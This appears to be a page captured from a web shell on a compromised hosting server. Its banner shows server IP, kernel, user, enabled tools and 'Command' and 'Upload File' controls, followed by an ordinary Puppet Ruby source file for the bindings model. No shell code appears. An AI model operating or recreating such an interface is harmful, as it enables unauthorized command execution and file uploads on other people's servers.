Server IP : 111.118.215.189 / Your IP : 18.216.116.62 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/ruby/vendor_ruby/puppet/pops/binder/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
require 'rgen/metamodel_builder' # The Bindings model is a model of Key to Producer mappings (bindings). # It is composed of a meta-model part (bindings_model_meta.rb), and # and implementation part (this file). # # @see Puppet::Pops::Binder::BindingsFactory The BindingsFactory for more details on how to create model instances. # @api public module Puppet::Pops::Binder require 'puppet/pops/binder/bindings_model_meta' # TODO: See PUP-2978 for possible performance optimization # Mix in implementation into the generated code module Bindings class BindingsModelObject include Puppet::Pops::Visitable include Puppet::Pops::Adaptable include Puppet::Pops::Containment end class ConstantProducerDescriptor module ClassModule def setValue(v) @value = v end def getValue() @value end def value=(v) @value = v end end end class NamedArgument module ClassModule def setValue(v) @value = v end def getValue() @value end def value=(v) @value = v end end end class InstanceProducerDescriptor module ClassModule def addArguments(val, index =-1) @arguments ||= [] @arguments.insert(index, val) end def removeArguments(val) raise "unsupported operation" end def setArguments(values) @arguments = [] values.each {|v| addArguments(v) } end end end end end